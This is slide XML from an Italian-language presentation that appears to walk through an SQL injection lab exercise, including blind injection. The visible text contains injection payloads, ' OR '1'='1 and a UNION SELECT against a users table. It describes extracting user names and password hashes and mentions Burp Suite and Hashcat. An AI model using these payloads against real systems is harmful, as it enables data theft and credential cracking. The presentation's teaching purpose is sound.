        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11239484" y="6971292"/>
            <a:ext cx="4264156" cy="2862875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2862875" w="4264156">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4264156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4264156" y="2862875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2862875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-71631" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="191987" y="1943066"/>
            <a:ext cx="8952013" cy="4187190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Per capire la struttura della query utilizzata dal database, sfrutteremo una query con l’operatore booleano qui di seguito</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>‘ OR ‘1’=’1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>L’utilizzo di questa espressione con l’operatore OR, ci restituirà dei risultati che sono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>sempre veri.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Come vediamo, ci vengono mostrati tutti gli utenti con nome e  cognome presenti sul DB.  Questo ci fa capire che la struttura della query del DB è all’incirca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>SELECT First name, Surname FROM Table WHERE id = variabile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="484584" y="7537859"/>
            <a:ext cx="8952013" cy="1672590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Ipotizzando che la tabella degli utenti si chiami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>users, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>useremo una query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>1‘ UNION SELECT Null, Null, FROM users#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Il risultato ci fa capire che il nome ipotizzato è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>quello giusto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, avendo come esito non solo l‘id 1 ma anche un firstname e un surname equivalenti a 0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9548">
            <a:off x="-5400392" y="-2622503"/>
            <a:ext cx="19961764" cy="19113389"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="19113389" w="19961764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19961763" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19961763" y="19113389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19113389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11752506" y="3128055"/>
            <a:ext cx="5056410" cy="5542189"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5542189" w="5056410">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5056410" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5056410" y="5542190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5542190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-52270" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="777180" y="380851"/>
            <a:ext cx="8366820" cy="819208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="6317"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5264">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5264">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t> Risultati tabella</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="484584" y="3388360"/>
            <a:ext cx="8952013" cy="2510790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Arrivati a questo punto, sappiamo il nome della tabella e il numero di parametri richiesti dalla query del DB, ovvero 2. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Provando di nuovo con una</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> Query UNION SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> tentiamo di risalire a Username e Password associata. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Il risultato è positivo in quanto ci vengono restituite le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>password in valori HASH che è il metodo di cifratura della password nei database.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331848" y="6049841"/>
            <a:ext cx="2702757" cy="1936380"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3603676" cy="2581840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3603676"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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3603676" cy="1666094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>Differenza traSQL Injection &amp; SQL  Injection (Blind)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1123950" y="6049841"/>
            <a:ext cx="2459408" cy="1513824"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3279211" cy="2018432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 7" id="7"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3279211" cy="1102686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>Descrizione SQL Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7787080" y="6080024"/>
            <a:ext cx="3155775" cy="2053975"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4207700" cy="2738633"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="4207700"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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 10" id="10"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="1806347"/>
              <a:ext cx="4207700" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="4207700" cy="539278"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>Burp suite</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15167980" y="7764591"/>
            <a:ext cx="3120020" cy="2987419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2987419" w="3120020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120020" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 13" id="13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11266418" y="6049841"/>
            <a:ext cx="2680634" cy="2951907"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3574179" cy="3935876"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3574179"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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 15" id="15"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3496571"/>
              <a:ext cx="3574179" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 16" id="16"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3574179" cy="2229502"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>Prove di inserimento variabili &amp; Verifica degli eventuali risultati</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14699527" y="6080024"/>
            <a:ext cx="2398854" cy="2468985"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3198472" cy="3291981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-66675"/>
              <a:ext cx="3198472"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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 19" id="19"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="2369755"/>
              <a:ext cx="3198472" cy="469487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="2940"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 20" id="20"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="915746"/>
              <a:ext cx="3198472" cy="1102686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="3360"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t> Risultati tabella &amp; Hashcat</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="1829822"/>
            <a:ext cx="11515725" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7679"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>Procedimento </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7679"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6399">
                <a:solidFill>
                  <a:srgbClr val="FFDE59"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Ultra-Bold"/>
              </a:rPr>
              <a:t>(Blind)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 22" id="22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1123950" y="5073102"/>
            <a:ext cx="13834282" cy="253591"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18445710" cy="338121"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 23" id="23"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="1156" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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5" id="25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="4278354" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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7" id="27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="13524447" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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9" id="29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5423755">
              <a:off x="18108745" y="1156"/>
              <a:ext cx="335808" cy="335808"/>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1" id="31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
